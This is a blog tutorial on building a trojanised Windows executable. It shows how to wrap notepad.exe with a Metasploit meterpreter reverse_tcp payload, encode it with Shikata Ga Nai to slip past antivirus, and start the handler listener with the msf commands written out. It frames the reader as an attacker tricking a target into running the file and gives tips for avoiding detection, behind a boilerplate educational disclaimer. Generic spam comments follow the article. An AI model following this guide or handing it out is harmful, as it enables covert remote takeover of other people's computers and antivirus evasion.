hacking Windows remotely with exploited executable

1. The articles contained on the website are for educational purposes only encouraging
users and Admins to better understand the environmental security measurement and
enable safer digital environment.
Geek-KB.com does not encourage, condone, or orchestrate attempts of hacking into
other servers or any other illegal activities. All actions taken by users are strictly
independent of Geek-KB.com. We are not responsible for any misuse of the techniques
listed on this website.
2. Geek-KB.com has the sole discretion to remove/edit users, articles, external
resources, or any other user-submitted content to protect itself from legal harm. This
legal disclaimer may be modified at any time
without notice.
3. Any damage caused by using any of the techniques taken from https://p2847-48-
527.s48.upress.link is at your own risk
and responsibility;

In this article, How To: Create an exploited executable file in order to remotely hack a Windows machine I will teach you how to exploit an executable file which will be sent to your target windows computer and will gain you full access privileges after running the executable file.

Pre-Requirements:

A Linux machine installed with MetaSploit framework

A target Windows machine

An executable file (In this example I will use notepad.exe)

Let’s Begin!

The type of exploit i’m going to use is called reverse_tcp, it means that when the user will run the exploited executable a tcp/ip session will be opened from the target computer to your local computer. The fact that the session is opened reversely will make it much harder for the attacked person to realize that he is actually being attacked as well as identifying the source of the attack.

The payload I chose is ‘windows/meterpreter/reverse_tcp’ , Then I’ve set the IP and Port of my own machine so that the tcp/ip session which will be opened, will connect to this IP in this Port. Using ‘msfencode’ , I’ve chosen the Shikata Ga Nai algorithm while pointing to the source executable file I’d like to set the payload on and the target executable file which will be sent to the target machine. The assumption behind encoded payloads is that fewer anti-virus products will pick up on them. Standard signature detection will be defeated, so the anti-virus program must either unpack the payloads statically, or run the applications dynamically in a sandbox and monitor their behaviour.

We have now finished working on the files and we’ll now set the corresponding settings on the local machine in order to start the listener. These are the commands I’ve use:

hacking Windows – Geek-KB.com

msf> use exploit/multi/handler

Sets msf to work with multi handler exploit.

msf> set payload windows/meterpreter/reverse_tcp

Sets the payload to match a windows 7 machine and use reverse_tcp.

msf> set LHOST 192.168.15.250

Sets my own computer’s IP address, the target computer (the one we want to hack) will connect to this IP, it’s the same IP which is also embedded in the exploited file i created.

msf> set LPORT 443

Sets my own computer’s port, the target computer will connect to this port. You can choose any port you wish between 1-65k but a port which is lower than 1024 is the preferred because then it would be harder to identify the hack.

msf> exploit

Starting the listener, waiting for the user on the target machine to double click the file. Once the user on the target machine runs the exploited file, a tcp/ip connection will be established between both computers while the issuer of the session is the attacked machine.

1. Geek-KB.com does not encourage, condone, or orchestrate attempts to hack into other servers or any other illegal activities. The articles contained inside this website are for entertainment / educational purposes only, and what actions people decide to take outside of this website are strictly independent of Geek-KB.com. We are not responsible if you break the law using techniques listed on this website.

2. Geek-KB.com has the sole discretion to remove/edit users, articles, external resources, or any other user-submitted content to protect itself from legal harm. This legal disclaimer may be modified at any time without notice.

3. Any damage caused by using any of the techniques taken from https://www.geek-kb.com is on your own responsibility, Use it at your own risk!

My partner and I stumbled over here coming from a different web page and thought I might check things out. I like what I see so now i’m following you. Look forward to looking into your web page for a second time.

This is really attention-grabbing, You’re an overly skilled blogger. I’ve joined your feed and look forward to in quest of extra of your wonderful post. Also, I’ve shared your site in my social networks

Fantastic goods from you, man. I have understand your stuff previous to and you are just too magnificent. I really like what you’ve acquired here, certainly like what you are saying and the way in which you say it.

You make it enjoyable and you still take care of to keep it wise. I can’t wait to read far more from you. This is really a tremendous site.

Hi, I think your website might be having browser compatibility issues. When I look at your blog in Opera, it looks fine but when opening in Internet Explorer, it has some overlapping. I just wanted to give you a quick heads up! Other then that, wonderful blog!

Hi I am so glad I found your web site, I really found you by mistake, while I was searching on Digg for something else, Regardless I am here now and would just like to say cheers for a marvelous post and a all round exciting blog (I also love the theme/design), I don’t have time to read through it all at the moment but I have saved it and also added in your RSS feeds, so when I have time I will be back to read more, Please do keep up the superb jo.

I absolutely love your blog and find nearly all of your post’s to be precisely what I’m looking for. can you offer guest writers to write content to suit your needs? I wouldn’t mind producing a post or elaborating on a lot of the subjects you write about here. Again, awesome web site!

Hello there! This is my 1st comment here so I just wanted to give a quick shout out and tell you I really enjoy reading your posts. Can you suggest any other blogs/websites/forums that cover the same subjects? Thanks a ton!

Hey just wanted to give you a quick heads up. The text in your article seem to be running off the screen in Ie. I’m not sure if this is a formatting issue or something to do with web browser compatibility but I figured I’d post to let you know.

The layout look great though! Hope you get the issue fixed soon. Thanks

Woah! I’m really loving the template/theme of this website. It’s simple, yet effective. A lot of times it’s difficult to get that “perfect balance” between usability and appearance. I must say that you’ve done a awesome job with this. Also, the blog loads very fast for me on Firefox. Outstanding Blog!

Howdy! This is my 1st comment here so I just wanted to give a quick shout out and tell you I genuinely enjoy reading your blog posts. Can you suggest any other blogs/websites/forums that deal with the same subjects? Thanks a ton!

Appreciating the time and energy you pput ino ykur site and in depth information you offer. It’s good to come achross a blog every once in a while that isn’t the same outdated rehashed material. Excellent read!

I really like your blog.. very nice colors & theme. Did you make this website yourself or did you hire someone to do it for you? Plz answer back as I’m looking to construct my own blog and would like to know where u got this from.

I am extremely impressed with your writing skills as well as with the layout on your weblog. Is this a paid theme or did you modify it yourself? Either way keep up the excellent quality writing, it is rare to see a great blog like this one today.

I appreciate you taking the time and effort to put this informative article together. I once again find myself personally spending a significant amount of time both reading and posting comments. But so what, it was still worth it!